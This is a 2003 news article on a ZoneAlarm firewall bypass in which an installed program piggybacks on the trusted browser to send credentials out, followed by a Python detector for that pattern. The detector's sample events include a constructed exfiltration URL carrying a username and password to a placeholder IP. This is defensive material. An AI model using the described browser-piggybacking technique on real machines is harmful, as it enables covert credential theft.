Thursday, July 03, 2003

ZoneLabs Won't Fix Hole In Free Firewall
July 1, 2003
By: Mark Hachman

ZoneLabs said it will not fix a vulnerability found in the freeware version of its ZoneAlarm firewall. The company said the vulnerability was a problem found in Windows, not its firewall, and that it would require the hacker equivalent of "brain surgery" to exploit.
Instead, ZoneLabs executives said that the vulnerability could be protected against by using one of its paid products: ZoneAlarm Plus, ZoneAlarm Pro, or its Integrity enterprise system.

According to the posting to the BugTraq mailing list, the vulnerability involves the Windows shell32.dll file and its ShellExecute function. When ShellExecute is passed a Web address as one of its parameters, the default web browser is launched to fetch that address -- and, under most ZoneAlarm configurations, the browser is already permitted to access web sites freely, without asking the user each time.

According to the poster, "aceh", that browser could quickly access a malicious web site, funnel a short string of confidential information (such as a username and password) and quickly redirect itself to an innocuous and trusted web site.

Although not stated expressly, the vulnerability appears to first require a Trojan to be loaded onto the user's machine via an email virus or some other means. However, "aceh" concluded that the vulnerability is common to all of the freeware versions of ZoneAlarm. Executives at ZoneLabs, however, said that the free version of ZoneAlarm provides adequate protection.
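The bypass described above leaves a tell in process-creation audit data: the trusted browser is started by something other than the user's shell or mail client, and the URL it is handed carries data in its query string. The following detection logic, added here as an illustration and not code from the article or from ZoneLabs, scans constructed sample events of the form (parent image, child image, child command line); the browser set, the expected-parent set, and the event shape are assumptions to adapt to a real audit source.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Constructed sample events (not taken from the article): parent image,
# child image, child command line, as a process-creation audit source might log them.
SAMPLE_EVENTS = [
    ("explorer.exe", "iexplore.exe", 'iexplore.exe "http://www.example.com/"'),
    ("update_helper.exe", "iexplore.exe",
     'iexplore.exe "http://203.0.113.9/c.php?u=alice&p=s3cret"'),
    ("update_helper.exe", "iexplore.exe", 'iexplore.exe "http://www.example.com/"'),
    ("outlook.exe", "iexplore.exe", 'iexplore.exe "http://www.example.com/news?id=42"'),
]

BROWSERS = {"iexplore.exe", "firefox.exe", "opera.exe"}  # assumption: browsers in use
# Parents that legitimately hand URLs to the browser on this desktop (assumption).
EXPECTED_PARENTS = {"explorer.exe", "outlook.exe"}
URL_RE = re.compile(r'https?://[^\s"\']+', re.IGNORECASE)


@dataclass
class Finding:
    parent: str
    url: str
    reason: str


def classify(parent, child, cmdline):
    """Return a Finding when a browser launch looks like trusted-app piggybacking."""
    if child.lower() not in BROWSERS:
        return None
    m = URL_RE.search(cmdline)
    if not m:
        return None  # browser started without a URL: nothing to piggyback on
    url = m.group(0)
    if parent.lower() in EXPECTED_PARENTS:
        return None  # ordinary user-driven launch
    # Unexpected parent plus data riding in the query string is the pattern
    # the posting describes: an unsanctioned program using the allowed browser.
    if urlparse(url).query:
        return Finding(parent, url, "unexpected parent launched browser with query data")
    return Finding(parent, url, "unexpected parent launched browser")


def scan(events):
    """Run classify() over an event sequence and keep the findings, in order."""
    return [f for f in (classify(*e) for e in events) if f]
```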

http://www.securityfocus.com/archive/1/326371

http://www.extremetech.com/print_article/0,3998,a=44172,00.asp
